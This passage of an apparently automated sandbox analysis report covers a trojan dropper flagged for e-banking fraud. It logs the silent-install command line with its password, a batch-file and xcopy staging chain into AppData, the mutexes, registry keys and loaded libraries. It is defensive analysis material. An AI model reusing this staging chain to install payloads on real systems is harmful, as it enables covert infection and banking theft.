Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0B
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0C
Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.dr | String found in binary or memory: https://sectigo.com/CPS0D
Source: reservation .exe | String found in binary or memory: https://www.globalsign.com/repository/0
Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265017891.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299122357.0000000005C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0D
Source: reservation .exe, 00000000.00000003.2037832146.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, reservation .exe, 00000000.00000003.2037382869.0000000002640000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000000.2039348105.0000000000401000.00000020.00000001.01000000.00000004.sdmp, reservation .tmp.3.dr | String found in binary or memory: https://www.innosetup.com/
Source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000312B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3330125779.000000006BCA0000.00000002.00000001.01000000.00000014.sdmp, ast.exe, 0000000A.00000002.3336427984.000000006C722000.00000002.00000001.01000000.00000013.sdmp, is-RFQHO.tmp.4.dr | String found in binary or memory: https://www.openssl.org/H
Source: xcopy.exe, 00000008.00000003.2457697380.000000000310F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.openssl.org/docs/faq.html
Source: reservation .exe, 00000000.00000003.2037832146.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, reservation .exe, 00000000.00000003.2037382869.0000000002640000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000000.2039348105.0000000000401000.00000020.00000001.01000000.00000004.sdmp, reservation .tmp.3.dr | String found in binary or memory: https://www.remobjects.com/ps
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED

                          E-Banking Fraud

Source: Yara match | File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6C8010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6EFEF0
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6C2D20
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6C7380
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B700A40
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6E1170
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6CF950
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6F6F40
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6C7730
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6EA790
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6CEEA0
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6F75D0
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B71BCF0
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6EDCD0
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: String function: 6B6F06B0 appears 135 times
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: String function: 6B6F05D0 appears 162 times
Source: reservation .exe | Static PE information: invalid certificate
Source: reservation .tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: reservation .tmp.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: reservation .exe, 00000000.00000003.2037832146.000000007FE26000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs reservation .exe
Source: reservation .exe, 00000000.00000000.2035698643.00000000004C6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs reservation .exe
Source: reservation .exe, 00000000.00000003.2037382869.000000000272A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs reservation .exe
Source: reservation .exe, 00000003.00000003.2459283655.0000000002278000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs reservation .exe
Source: reservation .exe | Binary or memory string: OriginalFileName vs reservation .exe
Source: reservation .exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal84.troj.evad.winEXE@16/63@1/2
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Programs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkslN63FF292C-2B60-4C63-A250-16B59EF35251
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Mutant created: \Sessions\1\BaseNamedObjects\3 @
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\02CC837A-11F4-4C58-AE40-A04E18FF470D7c
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Mutant created: \Sessions\1\BaseNamedObjects\U SVW3 E E E
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Mutant created: \Sessions\1\BaseNamedObjects\
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkwrN63FF292C-2B60-4C63-A250-16B59EF35251
Source: C:\Users\user\Desktop\reservation .exe | File created: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp
Source: Yara match | File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat""
Source: C:\Users\user\Desktop\reservation .exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\reservation .exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\reservation .exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\reservation .exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\reservation .exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: reservation .exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\reservation .exe | File read: C:\Users\user\Desktop\reservation .exe
Source: unknown | Process created: C:\Users\user\Desktop\reservation .exe "C:\Users\user\Desktop\reservation .exe"
Source: C:\Users\user\Desktop\reservation .exe | Process created: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp "C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp" /SL5="$10464,7120736,816128,C:\Users\user\Desktop\reservation .exe"
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Process created: C:\Users\user\Desktop\reservation .exe "C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
Source: C:\Users\user\Desktop\reservation .exe | Process created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp "C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp" /SL5="$2046A,7120736,816128,C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe"
Source: C:\Users\user\Desktop\reservation .exe | Process created: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp "C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp" /SL5="$10464,7120736,816128,C:\Users\user\Desktop\reservation .exe"
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Process created: C:\Users\user\Desktop\reservation .exe "C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
Source: C:\Users\user\Desktop\reservation .exe | Process created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp "C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp" /SL5="$2046A,7120736,816128,C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe"
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\reservation .exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: sqlite3.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: crtdll.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: quartz.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: avifil32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: wkscli.dll
